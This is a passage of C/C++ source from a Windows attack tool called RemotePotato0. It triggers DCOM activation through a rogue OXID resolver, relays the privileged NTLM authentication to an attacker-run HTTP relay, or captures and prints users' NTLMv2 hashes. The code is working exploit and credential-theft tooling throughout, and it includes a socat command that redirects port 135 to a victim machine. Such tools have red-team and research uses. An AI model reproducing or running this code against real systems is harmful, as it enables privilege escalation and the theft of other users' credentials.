| int type1BakLen = 0; 44 | 45 | SOCKET RPCSocketListen = CreateRPCSocketListen(rpcRelayServerListeningPort); 46 | SOCKET RPCSocketReflect = CreateRPCSocketReflect(rpcServerIp, rpcServerPort); 47 | 48 | do { 49 | iResult = recv(RPCSocketListen, recvbuf, recvbuflen, 0); 50 | ntlmIndex = findNTLMBytes(recvbuf, iResult); 51 | // if the rpc packet contains ntlm auth information we do our magic (cross protocol relay) 52 | if (ntlmIndex > 0) { 53 | // save the rpc packet of type1 authentication to forward it later to the fake RPC server (we reuse the RogueOxidResolver) 54 | memcpy(type1BakBuffer, recvbuf, 
iResult);
            type1BakLen = iResult;
            // copy in ntlmType1 the extracted auth information from the received buffer
            memcpy(ntlmType1, recvbuf + ntlmIndex, iResult - ntlmIndex);
            // forge the ntlm type2 message using the win32 api
            ForgeNtlmType2(ntlmType1, iResult - ntlmIndex, ntlmType2, &ntlmType2Len);
            // here we zero'd out the Reserved field to force a remote authentication on localhost. If this value is not set to 0 the auth will be broken.
            memset(ntlmType2 + NTLMv2_TYPE2_RESERVED_OFFSET, 0, 8);
            // here we communicate with our fake RPC Server to have just the template for rpc packets, sending the type1
            if (send(RPCSocketReflect, type1BakBuffer, type1BakLen, 0) == SOCKET_ERROR) {
                printf("[!] Couldn't communicate with the fake RPC Server\n");
                break;
            }
            // receiving the type2 message from the fake RPC Server to use as a template for our relayed auth
            iResult = recv(RPCSocketReflect, recvbuf, recvbuflen, 0);
            if (iResult == SOCKET_ERROR) {
                printf("[!] Couldn't receive the type2 message from the fake RPC Server\n");
                break;
            }
            // get the ntlmindex from the type2 message received from the fake rpc server
            ntlmIndex = findNTLMBytes(recvbuf, iResult);
            // in this function we take the packet template from a real rpc server and we alter the authentication part,
            // in this case we change the original type2 with the type2 received by the http server. We also adjust the len of the rpc packet fragLen and authLen
            // to not break the rpc protocol
            ForgeAndAlterType2Rpc(recvbuf, iResult, ntlmIndex, ntlmType2, ntlmType2Len, sendbuf);
            // send the altered type2 to the rpc client (the privileged auth)
            if (send(RPCSocketListen, sendbuf, ntlmIndex + ntlmType2Len, 0) == SOCKET_ERROR) {
                printf("[!] Couldn't send the altered type2 to the rpc client (the privileged auth)\n");
                break;
            }
            // receive the type3 auth from the rpc client. This is the privileged AUTH that the client is sending us
            iResult = recv(RPCSocketListen, recvbuf, recvbuflen, 0);
            if (iResult == SOCKET_ERROR) {
                printf("[!] Couldn't receive the type3 auth from the rpc client\n");
                break;
            }
            // extract the type3 auth from the rpc packet
            ExtractType3FromRpc(recvbuf, iResult, ntlmType3, &ntlmType3Len);
            // now we extract all the required data to print the hash in the lc format:
            PrintCapturedHash(ntlmType2, ntlmType3);
            break;
        }
    } while (iResult > 0);
    closesocket(RPCSocketListen);
    closesocket(RPCSocketReflect);
    WSACleanup();
}

void ForgeNtlmType2(char* ntlmType1, int ntlmType1Len, char* ntlmType2, int* ntlmType2Len) {
    CredHandle hCred;
    SecBufferDesc secClientBufferDesc, secServerBufferDesc;
    SecBuffer secClientBuffer, secServerBuffer;
    PCtxtHandle phContext;

    TCHAR lpPackageName[1024] = L"NTLM";
    TimeStamp ptsExpiry;

    int status = AcquireCredentialsHandle(
        NULL,
        lpPackageName,
        SECPKG_CRED_INBOUND,
        NULL,
        NULL,
        0,
        NULL,
        &hCred,
        &ptsExpiry);

    if (status != SEC_E_OK)
    {
        printf("Error in AquireCredentialsHandle\n");
        return;
    }

    InitTokenContextBuffer(&secClientBufferDesc, &secClientBuffer);
    InitTokenContextBuffer(&secServerBufferDesc, &secServerBuffer);

    phContext = new CtxtHandle();

    secClientBuffer.cbBuffer = static_cast(ntlmType1Len);
    secClientBuffer.pvBuffer = ntlmType1;

    ULONG fContextAttr;
    TimeStamp tsContextExpiry;

    status = AcceptSecurityContext(
        &hCred,
        nullptr,
        &secClientBufferDesc,
        ASC_REQ_ALLOCATE_MEMORY,
        SECURITY_NATIVE_DREP,
        phContext,
        &secServerBufferDesc,
        &fContextAttr,
        &tsContextExpiry);

    *ntlmType2Len = secServerBuffer.cbBuffer;
    memcpy(ntlmType2, (char*)secServerBuffer.pvBuffer, secServerBuffer.cbBuffer);
}

void InitTokenContextBuffer(PSecBufferDesc pSecBufferDesc, PSecBuffer pSecBuffer)
{
    pSecBuffer->BufferType = SECBUFFER_TOKEN;
    pSecBuffer->cbBuffer = 0;
    pSecBuffer->pvBuffer = nullptr;

    pSecBufferDesc->ulVersion = SECBUFFER_VERSION;
    pSecBufferDesc->cBuffers = 1;
    pSecBufferDesc->pBuffers = pSecBuffer;
}

void PrintCapturedHash(char *ntlmType2, char* ntlmType3) {
    unsigned char serverChallenge[8];
    unsigned char NTProofStr[16];
    unsigned char NTLMResponse[268];
    int* ntlmType3Offset;
    unsigned short* ntlmType3Length;

    short* domainLen, * userLen, * hostnameLen;
    __int32* domainOffset, * userOffset, * hostnameOffset;
    wchar_t domain[32], user[32], hostname[32];

    // parsing user info
    domainLen = (short*)(ntlmType3 + 28);
    userLen = (short*)(ntlmType3 + 36);
    hostnameLen = (short*)(ntlmType3 + 44);
    domainOffset = (__int32*)(ntlmType3 + 32);
    userOffset = (__int32*)(ntlmType3 + 40);
    hostnameOffset = (__int32*)(ntlmType3 + 48);
    memset(domain, 0, 32);
    memcpy(domain, ntlmType3 + (*domainOffset), *domainLen);
    memset(user, 0, 32);
    memcpy(user, ntlmType3 + (*userOffset), *userLen);
    memset(hostname, 0, 32);
    memcpy(hostname, ntlmType3 + (*hostnameOffset), *hostnameLen);

    // parsing captured hash
    memcpy(serverChallenge, &ntlmType2[NTLMv2_TYPE2_SERVER_CHALLENGE_OFFSET], NTLMv2_TYPE2_SERVER_CHALLENGE_LENGTH);
    ntlmType3Length = (unsigned short*)(ntlmType3 + NTLMv2_TYPE3_RESPONSE_LENGTH_OFFSET);
    ntlmType3Offset = (int*)(ntlmType3 + NTLMv2_TYPE3_RESPONSE_OFFSET_OFFSET);
    memcpy(NTProofStr, &ntlmType3[*ntlmType3Offset], NTLMv2_TYPE3_NTPROOFSTR_LENGTH);
    memcpy(NTLMResponse, &ntlmType3[(*ntlmType3Offset) + NTLMv2_TYPE3_NTPROOFSTR_LENGTH], *ntlmType3Length - NTLMv2_TYPE3_NTPROOFSTR_LENGTH);

    if (wcslen(user) < 2) {
        printf("[!] Couldn't capture the user credential hash :(\n");
        return;
    }

    g_SuccessTrigger = TRUE;

    // printing the golden data, format inspired by Responder :D
    printf("[+] User hash stolen!\n");
    printf("\n");
    printf("NTLMv2 Client\t: %S\n", hostname);
    printf("NTLMv2 Username\t: %S\\%S\n", domain, user);
    printf("NTLMv2 Hash\t: %S::%S:", user, domain);
    for (int i = 0; i < NTLMv2_TYPE2_SERVER_CHALLENGE_LENGTH; i++)
        printf("%02x", serverChallenge[i]);
    printf(":");
    for (int i = 0; i < NTLMv2_TYPE3_NTPROOFSTR_LENGTH; i++)
        printf("%02x", NTProofStr[i]);
    printf(":");
    for (int i = 0; i < *ntlmType3Length - NTLMv2_TYPE3_NTPROOFSTR_LENGTH; i++)
        printf("%02x", NTLMResponse[i]);
    printf("\n\n");
    //hexDump2((char*)"\nserverChallenge\n", serverChallenge, NTLMv2_TYPE2_SERVER_CHALLENGE_LENGTH);
    //hexDump2((char*)"\nNTProofStr\n", NTProofStr, NTLMv2_TYPE3_NTPROOFSTR_LENGTH);
    //hexDump2((char*)"\nNTLMResponse\n", NTLMResponse, *ntlmType3Length - NTLMv2_TYPE3_NTPROOFSTR_LENGTH);
}

--------------------------------------------------------------------------------
/RPCCaptureServer.h:
--------------------------------------------------------------------------------
#define SECURITY_WIN32

#pragma once
#include

void ForgeNtlmType2(char*, int, char*, int*);
void InitTokenContextBuffer(PSecBufferDesc, PSecBuffer);
void PrintCapturedHash(char*, char*);
void DoRpcServerCaptureCredsHash(wchar_t*, wchar_t*, wchar_t*);
--------------------------------------------------------------------------------
/RelayLib.cpp:
--------------------------------------------------------------------------------
#define WIN32_LEAN_AND_MEAN

#include "Windows.h"
#include "stdio.h"
#include
#include
#include
#include "RelayLib.h"

#pragma comment (lib, "Ws2_32.lib")

#pragma warning(disable : 4996) //_CRT_SECURE_NO_WARNINGS

SOCKET CreateRPCSocketListen(const wchar_t* listenport) {
    WSADATA wsaData;
    int iResult;
    char listen_port_a[12];

    SOCKET ListenSocket = INVALID_SOCKET;
    SOCKET ClientSocket = INVALID_SOCKET;

    struct addrinfo* result = NULL;
    struct addrinfo hints;

    // Initialize Winsock
    iResult = WSAStartup(MAKEWORD(2, 2), &wsaData);
    if (iResult != 0) {
        printf("WSAStartup failed with error: %d\n", iResult);
        exit(-1);
    }

    ZeroMemory(&hints, sizeof(hints));
    hints.ai_family = AF_INET;
    hints.ai_socktype = SOCK_STREAM;
    hints.ai_protocol = IPPROTO_TCP;
    hints.ai_flags = AI_PASSIVE;

    memset(listen_port_a, 0, 12);
    wcstombs(listen_port_a, listenport, 12);

    // Resolve the server address and port
    iResult = getaddrinfo(NULL, listen_port_a, &hints, &result);
    if (iResult != 0) {
        printf("getaddrinfo failed with error: %d\n", iResult);
        WSACleanup();
        exit(-1);
    }

    // Create a SOCKET for connecting to server
    ListenSocket = socket(result->ai_family, result->ai_socktype, result->ai_protocol);
    if (ListenSocket == INVALID_SOCKET) {
        printf("socket failed with error: %ld\n", WSAGetLastError());
        freeaddrinfo(result);
        WSACleanup();
        exit(-1);
    }

    // Setup the TCP listening socket
    iResult = bind(ListenSocket, result->ai_addr, (int)result->ai_addrlen);
    if (iResult == SOCKET_ERROR) {
        printf("bind failed with error: %d\n", WSAGetLastError());
        freeaddrinfo(result);
        closesocket(ListenSocket);
        WSACleanup();
        exit(-1);
    }

    freeaddrinfo(result);

    printf("[*] RPC relay server listening on port %S ...\n", listenport);
    iResult = listen(ListenSocket, SOMAXCONN);
    if (iResult == SOCKET_ERROR) {
        printf("listen failed with error: %d\n", WSAGetLastError());
        closesocket(ListenSocket);
        WSACleanup();
        exit(-1);
    }

    // Accept a client socket
    ClientSocket = accept(ListenSocket, (sockaddr*)NULL, (int*)NULL);
    if (ClientSocket == INVALID_SOCKET) {
        printf("accept failed with error: %d\n", WSAGetLastError());
        closesocket(ListenSocket);
        WSACleanup();
        exit(-1);
    }
    printf("[+] Received the relayed authentication on the RPC relay server on port %S\n", listenport);
    // No longer need server socket
    closesocket(ListenSocket);
    return ClientSocket;
}

SOCKET CreateRPCSocketReflect(const wchar_t* remoteRPCIp, const wchar_t* remoteRPCport) {
    //----------------------
    // Initialize Winsock

    char remoteRPCIp_a[20];
    char remoteRPCport_a[12];
    int remotePort;
    WSADATA wsaData;
    int iResult = WSAStartup(MAKEWORD(2, 2), &wsaData);
    if (iResult != NO_ERROR) {
        wprintf(L"WSAStartup function failed with error: %d\n", iResult);
        return 1;
    }
    //----------------------
    // Create a SOCKET for connecting to server
    SOCKET ConnectSocket;
    ConnectSocket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (ConnectSocket == INVALID_SOCKET) {
        wprintf(L"socket function failed with error: %ld\n", WSAGetLastError());
        WSACleanup();
        return 1;
    }
    //----------------------
    // The sockaddr_in structure specifies the address family,
    // IP address, and port of the server to be connected to.

    memset(remoteRPCport_a, 0, 12);
    wcstombs(remoteRPCport_a, remoteRPCport, 12);
    memset(remoteRPCIp_a, 0, 20);
    wcstombs(remoteRPCIp_a, remoteRPCIp, 20);
    remotePort = atoi(remoteRPCport_a);
    sockaddr_in clientService;
    clientService.sin_family = AF_INET;
    clientService.sin_addr.s_addr = inet_addr(remoteRPCIp_a);
    clientService.sin_port = htons(remotePort);

    //----------------------
    // Connect to server.
    iResult = connect(ConnectSocket, (SOCKADDR*)& clientService, sizeof(clientService));
    if (iResult == SOCKET_ERROR) {
        wprintf(L"CreateRPCSocketReflect: connect function failed with error: %ld\n", WSAGetLastError());
        printf("Couldn't connect to RPC Server %S on port %S\n", remoteRPCIp, remoteRPCport);
        iResult = closesocket(ConnectSocket);
        if (iResult == SOCKET_ERROR)
            wprintf(L"closesocket function failed with error: %ld\n", WSAGetLastError());
        WSACleanup();
        return 1;
    }

    printf("[*] Connected to RPC Server %S on port %S\n", remoteRPCIp, remoteRPCport);
    return ConnectSocket;
}

void ForgeAndAlterType2Rpc(char* rpcType2Packet, int rpcType2PacketLen, int authIndexStart, char* ntlmType2, int ntlmType2Len, char* newRpcType2Packet) {
    short* fragLen = (short*)rpcType2Packet + 4;
    short* authLen = (short*)rpcType2Packet + 5;
    int ntlmPacketLen = rpcType2PacketLen - authIndexStart;
    *fragLen = *fragLen - ntlmPacketLen + ntlmType2Len;
    *authLen = ntlmType2Len;
    memcpy(newRpcType2Packet, rpcType2Packet, authIndexStart);
    memcpy(newRpcType2Packet + authIndexStart, ntlmType2, ntlmType2Len);
}

void ExtractType3FromRpc(char* rpcPacket, int rpcPacketLen, char* ntlmType3, int* ntlmType3Len) {
    int ntlmIndex = findNTLMBytes(rpcPacket, rpcPacketLen);
    short* authLen = (short*)rpcPacket + 5;
    memcpy(ntlmType3, rpcPacket + ntlmIndex, *authLen);
    *ntlmType3Len = (int)* authLen;
}

int findNTLMBytes(char* bytes, int len) {
    //Find the NTLM bytes in a packet and return the index to the start of the NTLMSSP header.
    //The NTLM bytes (for our purposes) are always at the end of the packet, so when we find the header,
    //we can just return the index
    char pattern[7] = { 0x4E, 0x54, 0x4C, 0x4D, 0x53, 0x53, 0x50 };
    int pIdx = 0;
    int i;
    for (i = 0; i < len; i++) {
        if (bytes[i] == pattern[pIdx]) {
            pIdx = pIdx + 1;
            if (pIdx == 7) return (i - 6);
        }
        else {
            pIdx = 0;
        }
    }
    return -1;
}

//debug
void hexDump2(char* desc, void* addr, int len) {
    int i;
    unsigned char buff[17];
    unsigned char* pc = (unsigned char*)addr;

    // Output description if given.
    if (desc != NULL)
        printf("%s:\n", desc);

    if (len == 0) {
        printf(" ZERO LENGTH\n");
        return;
    }
    if (len < 0) {
        printf(" NEGATIVE LENGTH: %i\n", len);
        return;
    }

    // Process every byte in the data.
    for (i = 0; i < len; i++) {
        // Multiple of 16 means new line (with line offset).

        if ((i % 16) == 0) {
            // Just don't print ASCII for the zeroth line.
            if (i != 0)
                printf(" %s\n", buff);

            // Output the offset.
            printf(" %04x ", i);
        }

        // Now the hex code for the specific character.
        printf(" %02x", pc[i]);

        // And store a printable ASCII character for later.
        if ((pc[i] < 0x20) || (pc[i] > 0x7e))
            buff[i % 16] = '.';
        else
            buff[i % 16] = pc[i];
        buff[(i % 16) + 1] = '\0';
    }

    // Pad out last line if not exactly 16 characters.
    while ((i % 16) != 0) {
        printf(" ");
        i++;
    }

    // And print the final ASCII bit.
    printf(" %s\n", buff);
}

--------------------------------------------------------------------------------
/RelayLib.h:
--------------------------------------------------------------------------------
#pragma once
#include "Windows.h"

SOCKET CreateRPCSocketListen(const wchar_t*);
SOCKET CreateRPCSocketReflect(const wchar_t*, const wchar_t*);
void ForgeAndAlterType2Rpc(char*, int, int, char*, int, char*);
void ExtractType3FromRpc(char*, int, char*, int*);
int findNTLMBytes(char*, int);

//debug
void hexDump2(char*, void*, int);
--------------------------------------------------------------------------------
/RemotePotato0.cpp:
--------------------------------------------------------------------------------
#include "Windows.h"
#include "stdio.h"
#include "HTTPCrossProtocolRelay.h"
#include "RPCCaptureServer.h"
#include "RogueOxidResolver.h"
#include "IStorageTrigger.h"
#include "RogueOxidResolver_h.h"
#include "IStandardActivator_h.h"
#include

int g_sessionID=-1;
wchar_t* g_rpcRelayServerListeningPort;
wchar_t* rogueOxidResolverIp;
wchar_t* rogueOxidResolverPort;
bool juicyPotatoCompatible;

BOOL g_SuccessTrigger = FALSE;

DWORD WINAPI ThreadRogueOxidResolver(LPVOID lpParam);
DWORD WINAPI ThreadHTTPCrossProtocolRelay(LPVOID lpParam);
DWORD WINAPI ThreadRpcServerCaptureCredsHash(LPVOID lpParam);
void TriggerDCOM(wchar_t*);
void TriggerDCOMWithSessionID(wchar_t*);
void usage();
BOOL IsJuicyPotatoCompatible();

typedef NTSTATUS(NTAPI* pRtlGetVersion)(OSVERSIONINFOEX* lpVersionInformation);

struct THREAD_PARAMETERS
{
    wchar_t* remoteHTTPRelayServerIp;
    wchar_t* remoteHTTPRelayServerPort;
    wchar_t* rpcServerIpReflection;
    wchar_t* rpcServerPortReflection;
    wchar_t* rpcRelayServerListeningPort;
};


int wmain(int argc, wchar_t** argv)
{
    int fModule = -1;
    wchar_t defaultRemoteHTTPRelayServerPort[] = L"80";
    wchar_t defaultRogueOxidResolverIp[] = L"127.0.0.1";
    wchar_t defaultRogueOxidResolverPort[] = L"9999";
    wchar_t defaultRpcRelayServerListeningPort[] = L"9997";
    wchar_t defaultClsid[] = L"{5167B42F-C111-47A1-ACC4-8EABE61B0B54}";
    wchar_t* remoteHTTPRelayServerIp = NULL;
    wchar_t* remoteHTTPRelayServerPort = defaultRemoteHTTPRelayServerPort;
    wchar_t* rpcRelayServerListeningPort = defaultRpcRelayServerListeningPort;
    wchar_t* clsid = defaultClsid;
    rogueOxidResolverIp = defaultRogueOxidResolverIp;
    rogueOxidResolverPort = defaultRogueOxidResolverPort;

    int cnt = 1;
    while ((argc > 1) && (argv[cnt][0] == '-'))
    {

        switch (argv[cnt][1])
        {

        case 'm':
            ++cnt;
            --argc;
            fModule = _wtoi(argv[cnt]);
            break;

        case 'r':
            ++cnt;
            --argc;
            remoteHTTPRelayServerIp = argv[cnt];
            break;

        case 't':
            ++cnt;
            --argc;
            remoteHTTPRelayServerPort = argv[cnt];
            break;

        case 'l':
            ++cnt;
            --argc;
            rpcRelayServerListeningPort = argv[cnt];
            break;

        case 's':
            ++cnt;
            --argc;
            g_sessionID = _wtoi(argv[cnt]);
            break;

        case 'c':
            ++cnt;
            --argc;
            clsid = argv[cnt];
            break;

        case 'p':
            ++cnt;
            --argc;
            rogueOxidResolverPort = argv[cnt];
            break;

        case 'x':
            ++cnt;
            --argc;
            rogueOxidResolverIp = argv[cnt];
            break;

        case 'h':
            usage();
            exit(0);

        default:
            printf("Wrong Argument: %S\n", argv[cnt]);
            usage();
            exit(-1);
        }
        ++cnt;
        --argc;
    }

    if (fModule == -1) {
        usage();
        exit(-1);
    }

    THREAD_PARAMETERS threads_params = {};
    threads_params.remoteHTTPRelayServerIp = remoteHTTPRelayServerIp;
    threads_params.remoteHTTPRelayServerPort = remoteHTTPRelayServerPort;
    threads_params.rpcServerIpReflection = defaultRogueOxidResolverIp;
    threads_params.rpcServerPortReflection = rogueOxidResolverPort;
    threads_params.rpcRelayServerListeningPort = rpcRelayServerListeningPort;
    HANDLE hThreadServer;

    if (fModule == 0 || fModule == 2) {
        g_rpcRelayServerListeningPort = rpcRelayServerListeningPort;
        CreateThread(NULL, 0, ThreadRogueOxidResolver, (LPVOID)rogueOxidResolverPort, 0, NULL);
        if (IsJuicyPotatoCompatible()) {
            printf("[*] Detected a Windows Server version compatible with JuicyPotato. RogueOxidResolver can be run locally on 127.0.0.1\n");
            juicyPotatoCompatible = true;
        }
        else
        {
            if (rogueOxidResolverIp == defaultRogueOxidResolverIp) {
                printf("[!] Detected a Windows Server version not compatible with JuicyPotato, you cannot run the RogueOxidResolver on 127.0.0.1. RogueOxidResolver must be run remotely.\n");
                printf("[!] Example Network redirector: \n\tsudo socat -v TCP-LISTEN:135,fork,reuseaddr TCP:{{ThisMachineIp}}:%S\n", rogueOxidResolverPort);
                exit(-1);
            }
            printf("[*] Detected a Windows Server version not compatible with JuicyPotato. RogueOxidResolver must be run remotely. Remember to forward tcp port 135 on %S to your victim machine on port %S\n", remoteHTTPRelayServerIp, rogueOxidResolverPort);
            printf("[*] Example Network redirector: \n\tsudo socat -v TCP-LISTEN:135,fork,reuseaddr TCP:{{ThisMachineIp}}:%S\n", rogueOxidResolverPort);
            juicyPotatoCompatible = false;
        }
    }
    else {
        // using the system oxid resolver to forge rpc packet template
        threads_params.rpcServerIpReflection = (wchar_t*)L"127.0.0.1";
        threads_params.rpcServerPortReflection = (wchar_t*)L"135";
    }

    if (fModule == 0 || fModule == 1) {
        if (remoteHTTPRelayServerIp == NULL)
        {
            printf("[!] Remote HTTP Relay server ip must be set in module 0 and 1, set it with the -r flag.\n");
            exit(-1);
        }
        printf("[*] Starting the NTLM relay attack, launch ntlmrelayx on %S!!\n", remoteHTTPRelayServerIp);
        hThreadServer = CreateThread(NULL, 0, ThreadHTTPCrossProtocolRelay, (LPVOID)& threads_params, 0, NULL);
    }
    else {
        printf("[*] Starting the RPC server to capture the credentials hash from the user authentication!!\n");
        hThreadServer = CreateThread(NULL, 0, ThreadRpcServerCaptureCredsHash, (LPVOID)& threads_params, 0, NULL);
    }

    if (fModule == 0 || fModule == 2) {
        if (g_sessionID == -1)
            TriggerDCOM(clsid);
        else
            TriggerDCOMWithSessionID(clsid);
    }

    WaitForSingleObject(hThreadServer, INFINITE);
    return 0;
}

DWORD WINAPI ThreadRogueOxidResolver(LPVOID lpParam)
{
    size_t pReturnValue;
    char listening_port[6];
    wcstombs_s(&pReturnValue, listening_port, 5, (const wchar_t*)lpParam, 5);
    RunRogueOxidResolver(listening_port);
    return 0;
}

DWORD WINAPI ThreadRpcServerCaptureCredsHash(LPVOID lpParam) {
    THREAD_PARAMETERS* thread_params = (THREAD_PARAMETERS*)lpParam;
    DoRpcServerCaptureCredsHash(thread_params->rpcServerIpReflection, thread_params->rpcServerPortReflection, thread_params->rpcRelayServerListeningPort);
    return 0;
}

DWORD WINAPI ThreadHTTPCrossProtocolRelay(LPVOID lpParam) {
    THREAD_PARAMETERS* thread_params = (THREAD_PARAMETERS*)lpParam;
    DoHTTPCrossProtocolRelay(thread_params->remoteHTTPRelayServerIp, thread_params->remoteHTTPRelayServerPort, thread_params->rpcServerIpReflection, thread_params->rpcServerPortReflection, thread_params->rpcRelayServerListeningPort);
    return 0;
}

void TriggerDCOM(wchar_t* clsid_string)
{
    CoInitialize(NULL);

    //Create IStorage object
    IStorage* stg = NULL;
    ILockBytes* lb = NULL;
    HRESULT res;

    res = CreateILockBytesOnHGlobal(NULL, TRUE, &lb);
    res = StgCreateDocfileOnILockBytes(lb, STGM_CREATE | STGM_READWRITE | STGM_SHARE_EXCLUSIVE, 0, &stg);

    //Initialize IStorageTrigger object
    IStorageTrigger* t = new IStorageTrigger(stg);

    CLSID clsid;
    CLSIDFromString(clsid_string, &clsid);
    CLSID tmp;
    //IUnknown IID
    CLSIDFromString(OLESTR("{00000000-0000-0000-C000-000000000046}"), &tmp);
    MULTI_QI qis[1];
    qis[0].pIID = &tmp;
    qis[0].pItf = NULL;
    qis[0].hr = 0;

    //Call CoGetInstanceFromIStorage
    printf("[*] Calling CoGetInstanceFromIStorage with CLSID:%S\n", clsid_string);
    HRESULT status = CoGetInstanceFromIStorage(NULL, &clsid, NULL, CLSCTX_LOCAL_SERVER, t, 1, qis);
    if (!g_SuccessTrigger)
    {
        if (status == CO_E_BAD_PATH)
            printf("[!] Error. CLSID %S not found. Bad path to object.\n", clsid_string);
        else
            printf("[!] Error. Trigger DCOM failed with status: 0x%x\n", status);
        exit(-1);
    }
    //debug
    //printf("[*] CoGetInstanceFromIStorage status:0x%x\n", status);
    CoUninitialize();
}

void TriggerDCOMWithSessionID(wchar_t* clsid_string)
{
    CoInitialize(NULL);

    //Create IStorage object
    IStorage* stg = NULL;
    ILockBytes* lb = NULL;
    HRESULT res;

    res = CreateILockBytesOnHGlobal(NULL, TRUE, &lb);
    res = StgCreateDocfileOnILockBytes(lb, STGM_CREATE | STGM_READWRITE | STGM_SHARE_EXCLUSIVE, 0, &stg);

    //Initialize IStorageTrigger object
    IStorageTrigger* t = new IStorageTrigger(stg);

    CLSID clsid;
    CLSIDFromString(clsid_string, &clsid);
    CLSID tmp, CLSID_ComActivator;
    //IUnknown IID
    CLSIDFromString(OLESTR("{00000000-0000-0000-C000-000000000046}"), &tmp);
    //ComActivator CLSID
    CLSIDFromString(OLESTR("{0000033C-0000-0000-c000-000000000046}"), &CLSID_ComActivator);

    MULTI_QI qis[1];
    qis[0].pIID = &tmp;
    qis[0].pItf = NULL;
    qis[0].hr = 0;
    IStandardActivator* pComAct;
    HRESULT r = CoCreateInstance(CLSID_ComActivator, NULL, CLSCTX_INPROC_SERVER, IID_IStandardActivator, (LPVOID*)&pComAct);
    //printf("CoCreate=%d\n", r);
    ISpecialSystemProperties* pSpecialProperties = NULL;
    //printf("start query inter\n");
    r = pComAct->QueryInterface(IID_ISpecialSystemProperties, (void**)& pSpecialProperties);
    //printf("query inter: %d\n", r);
    //printf("start set session");
    r = pSpecialProperties->SetSessionId(g_sessionID, 0, 1);
    //printf("set session: %d\n", r);
    printf("[*] Spawning COM object in the session: %d\n", g_sessionID);
    printf("[*] Calling StandardGetInstanceFromIStorage with CLSID:%S\n", clsid_string);
    HRESULT status = pComAct->StandardGetInstanceFromIStorage(NULL, &clsid, NULL, CLSCTX_LOCAL_SERVER, t, 1, qis);
    std::string message = std::system_category().message(status);
    //printf("Error: %s\n", message.c_str());
    //Call CoGetInstanceFromIStorage
    //printf("[*] Calling CoGetInstanceFromIStorage with CLSID:%S\n", clsid_string);
    //HRESULT status = CoGetInstanceFromIStorage(NULL, &clsid, NULL, CLSCTX_LOCAL_SERVER, t, 1, qis);
    if (!g_SuccessTrigger)
    {
        if (status == CO_E_BAD_PATH)
            printf("[!] Error. CLSID %S not found. Bad path to object.\n", clsid_string);
        else
            printf("[!] Error. Trigger DCOM failed with status: 0x%x - %s\n", status, message.c_str());
        exit(-1);
    }
    //debug
    //printf("[*] CoGetInstanceFromIStorage status:0x%x\n", status);
    CoUninitialize();
}

BOOL IsJuicyPotatoCompatible() {
    OSVERSIONINFOEX Version;
    memset(&Version, 0x00, sizeof(Version));
    Version.dwOSVersionInfoSize = sizeof(Version);
    pRtlGetVersion RtlGetVersion = (pRtlGetVersion)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "RtlGetVersion");
    RtlGetVersion(&Version);
    if (Version.dwMajorVersion <= 10 && Version.dwBuildNumber <= 17134)
        return true;
    return false;
}

void usage()
{
    printf("\n\n\tRemotePotato0\n\t@splinter_code & @decoder_it\n\n\n\n");
    printf("Mandatory args: \n"
        "-m module\n"
        "\tAllowed values:\n"
        "\t0 - Rpc2Http cross protocol relay server + potato trigger (default)\n"
        "\t1 - Rpc2Http cross protocol relay server\n"
        "\t2 - Rpc capture (hash) server + potato trigger\n"
        "\t3 - Rpc capture (hash) server\n"
    );

    printf("\n\n");
    printf("Other args: (someone could be mandatory and/or optional based on the module you use) \n"
        "-r Remote HTTP relay server ip\n"
        "-t Remote HTTP relay server port (Default 80)\n"
        "-x Rogue Oxid Resolver ip (default 127.0.0.1)\n"
        "-p Rogue Oxid Resolver port (default 9999)\n"
        "-l RPC Relay server listening port (Default 9997)\n"
        "-s Session id for the Cross Session Activation attack (default disabled)\n"
        "-c CLSID (Default {5167B42F-C111-47A1-ACC4-8EABE61B0B54})\n"
    );
}
--------------------------------------------------------------------------------
/RemotePotato0.sln:
--------------------------------------------------------------------------------

Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio Version 16
VisualStudioVersion = 16.0.29230.47
MinimumVisualStudioVersion = 10.0.40219.1
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "RemotePotato0", "RemotePotato0.vcxproj", "{B88B65D3-2689-4E39-892C-7532087174CB}"
EndProject
Global
	GlobalSection(SolutionConfigurationPlatforms) = preSolution
		Debug|x64 = Debug|x64
		Debug|x86 = Debug|x86
		Release|x64 = Release|x64
		Release|x86 = Release|x86
	EndGlobalSection
	GlobalSection(ProjectConfigurationPlatforms) = postSolution
		{B88B65D3-2689-4E39-892C-7532087174CB}.Debug|x64.ActiveCfg = Debug|x64
		{B88B65D3-2689-4E39-892C-7532087174CB}.Debug|x64.Build.0 = Debug|x64
		{B88B65D3-2689-4E39-892C-7532087174CB}.Debug|x86.ActiveCfg = Debug|Win32
		{B88B65D3-2689-4E39-892C-7532087174CB}.Debug|x86.Build.0 = Debug|Win32
		{B88B65D3-2689-4E39-892C-7532087174CB}.Release|x64.ActiveCfg = Release|x64
		{B88B65D3-2689-4E39-892C-7532087174CB}.Release|x64.Build.0 = Release|x64
		{B88B65D3-2689-4E39-892C-7532087174CB}.Release|x86.ActiveCfg = Release|Win32
		{B88B65D3-2689-4E39-892C-7532087174CB}.Release|x86.Build.0 = Release|Win32
	EndGlobalSection
	GlobalSection(SolutionProperties) = preSolution
		HideSolutionNode = FALSE
	EndGlobalSection
	GlobalSection(ExtensibilityGlobals) = postSolution
		SolutionGuid = {676A99B9-A2DE-45FB-BA6A-C19D26A95EFF}
	EndGlobalSection
EndGlobal

--------------------------------------------------------------------------------
/RemotePotato0.vcxproj:
--------------------------------------------------------------------------------
Debug Win32
Release Win32
Debug x64
Release x64
16.0 {B88B65D3-2689-4E39-892C-7532087174CB} Win32Proj RemotePotato0 10.0
Application true v142 Unicode
Application false v142 true Unicode
Application true v142 Unicode
Application false v142 true Unicode
true
true
false
false
Level3 Disabled true WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) true
Console true
Level3 Disabled true _DEBUG;_CONSOLE;%(PreprocessorDefinitions) true
Console true
Level3 MaxSpeed true true true WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) true MultiThreaded
Console true true false
Level3 MaxSpeed true true true NDEBUG;_CONSOLE;%(PreprocessorDefinitions) true MultiThreaded
Console true true false
--------------------------------------------------------------------------------
/RogueOxidResolver.cpp:
--------------------------------------------------------------------------------
#include "Windows.h"
#include "stdio.h"
#include "RogueOxidResolver_h.h"
#include "RogueOxidResolver.h"

#pragma comment( lib, "Rpcrt4.lib" )

extern wchar_t* g_rpcRelayServerListeningPort;

